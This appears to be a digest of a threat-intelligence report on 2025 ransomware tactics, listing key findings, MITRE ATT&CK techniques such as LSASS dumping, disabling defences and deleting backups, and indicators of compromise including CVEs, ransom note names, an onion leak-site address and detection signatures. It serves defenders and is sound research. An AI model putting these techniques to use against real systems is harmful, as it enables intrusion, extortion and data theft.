Threat Research

Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape | Google Cloud Blog

GoogleCloudIntel
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape | Google Cloud Blog

Ransomware actors continued to evolve in 2025, with a record number of victims posted to data leak sites, increased use of data-theft extortion, continued targeting of VPNs/firewalls via vulnerability exploitation, and a notable prevalence of REDBIKE ransomware. The ecosystem showed signs of declining profitability and operational shifts—such as increased targeting of smaller organizations, use of tunnelers and RMM abuse, and integration of AI and Web3—with #REDBIKE #CLOP

Keypoints

  • Exploitation of vulnerabilities was the most common initial access vector, frequently targeting VPN and firewall products such as Fortinet, SonicWall, Palo Alto, and Citrix.
  • Approximately 77% of analyzed ransomware intrusions included suspected or confirmed data theft, up from ~57% in 2024, with tools like Rclone and MEGASync commonly used for exfiltration.
  • REDBIKE was the most frequently observed ransomware family in Mandiant investigations, appearing in about 30% of incidents.
  • In ~43% of incidents threat actors targeted virtualization infrastructure (ESXi/vCenter), and some operations automated portions of ransomware deployment against virtual hosts.
  • Common post-compromise techniques included credential theft (MIMIKATZ, LSASS/NTDS dumps), lateral movement via RDP/SMB/SSH, and persistence via scheduled tasks, services, and tunnelers (CLOUDFLARED, VIPERTUNNEL, SYSTEMBC).
  • Actors engaged in anti-detection and anti-recovery tactics such as disabling Windows Defender, deleting backups and VSS, clearing logs, and tampering with backup systems to frustrate recovery efforts.
  • The RaaS ecosystem remained resilient despite law enforcement and actor disruptions, with new or rebranded operators (e.g., Qilin, Akira, LOCKBIT.WARLOCK) filling vacuums and some actors adopting AI and Web3 technologies.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – Exploited vulnerabilities were the most common initial access vector, targeting VPNs and firewalls (‘the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls.’)
  • [T1189 ] Drive-by Compromise – Web compromise, malvertising, and SEO were used to distribute initial payloads (‘leverag[ed] malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads’).
  • [T1078 ] Valid Accounts – Compromised or attacker-created legitimate credentials were used for access and persistence (‘the threat actor leveraged compromised legitimate credentials to access the victim environment’).
  • [T1110 ] Brute Force – Bruteforce attacks were used against VPN and other accounts to gain initial access (‘the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year’).
  • [T1021 ] Remote Services – RDP/SMB/SSH were extensively abused for lateral movement and execution (‘in approximately 85% of intrusions, threat actors leveraged RDP…’; ‘leveraged SMB for lateral movement’; ‘used PuTTY and KiTTY to establish SSH connections’).
  • [T1021.001 ] Remote Desktop Protocol – RDP used with compromised/created accounts for lateral movement (‘in approximately 85% of intrusions, threat actors leveraged RDP’).
  • [T1021.002 ] SMB/Windows Admin Shares – SMB used to access shares, stage payloads, and execute ransomware (‘leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts’).
  • [T1021.004 ] SSH – SSH used for lateral movement to ESXi and other hosts (‘used PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems’).
  • [T1003 ] Credential Dumping – Credentials were harvested via LSASS memory dumps, NTDS.dit copies, and registry hive exports (‘dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the SAM, SYSTEM, and SECURITY registry hives’).
  • [T1003.001 ] LSASS Memory – LSASS memory dumps were used to obtain credentials (‘dumping the Local Security Authority Subsystem Service (LSASS) process memory’).
  • [T1555 ] Credentials from Password Stores – Actors targeted password managers and browser-stored credentials (KeePass, Bitwarden, Chromium-based browsers) (‘accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database’).
  • [T1558 ] Steal or Forge Kerberos Tickets (Kerberoasting) – Kerberoasting and related Kerberos attacks were used to target Windows authentication (‘Other observed methods include Kerberoasting’).
  • [T1059 ] Command and Scripting Interpreter (PowerShell) – PowerShell was heavily used for reconnaissance, credential theft, and execution (‘we consistently used PowerShell to query Active Directory…’; many Base64-encoded PowerShell commands observed).
  • [T1053 ] Scheduled Task/Job – Scheduled tasks were created to maintain persistence and run tunnelers or disable defenses (‘registered a scheduled task to run the LIONSHARE tunneler every 12 hours’).
  • [T1543 ] Create or Modify System Process (Windows Service) – Services were created to persistently run malware and ransomware (‘created a Windows service to run a command to execute the ransomware payload’).
  • [T1562 ] Impair Defenses – Security products and settings were disabled or modified, including Defender registry changes and exclusions (‘ran commands to modify a variety of values associated with Windows Defender registry keys’).
  • [T1490 ] Inhibit System Recovery – Backups and snapshots were deleted or backup systems compromised to hinder recovery (‘deleted vCenter backup volumes’; ‘deleted backups and snapshots prior to encryption’).
  • [T1567 ] Exfiltration Over Web Service – Legitimate cloud and web services (MEGA, OneDrive, Azure, Cloudzy) and tools like Rclone were used to exfiltrate stolen data (‘ran Rclone to exfiltrate data…’; ‘transferring stolen data to attacker-controlled OneDrive accounts’).

Indicators of Compromise

  • [CVE ] exploited vulnerabilities used for initial access – CVE-2024-21762 (Fortinet), CVE-2025-53770 (Microsoft SharePoint), and multiple other CVEs referenced in Table 1.
  • [File name ] ransom/readme and payload filenames – ‘akira_readme.txt’, ‘INC-README’, and other ransom note/readme filenames observed in deployed ransomware.
  • [Onion domain ] TOR negotiation/LEAK sites and onion strings – ‘akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion’ and generic ‘.onion’ negotiation site references in YARA rules.
  • [YARA / imphash ] detection signatures referenced in report – pe.imphash ‘ff67c703589f775db9aed5a03e4489b0’ (SAFEPAY) and multiple YARA rule strings/hex patterns provided for AGENDA, REDBIKE, CLOP, INC, PLAYCRYPT, and others.
  • [Ransomware family ] observed malware/extortion brands – REDBIKE, AGENDA, INC, CLOP (and many more families and DLS brands listed in Table 3).

Read more: https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint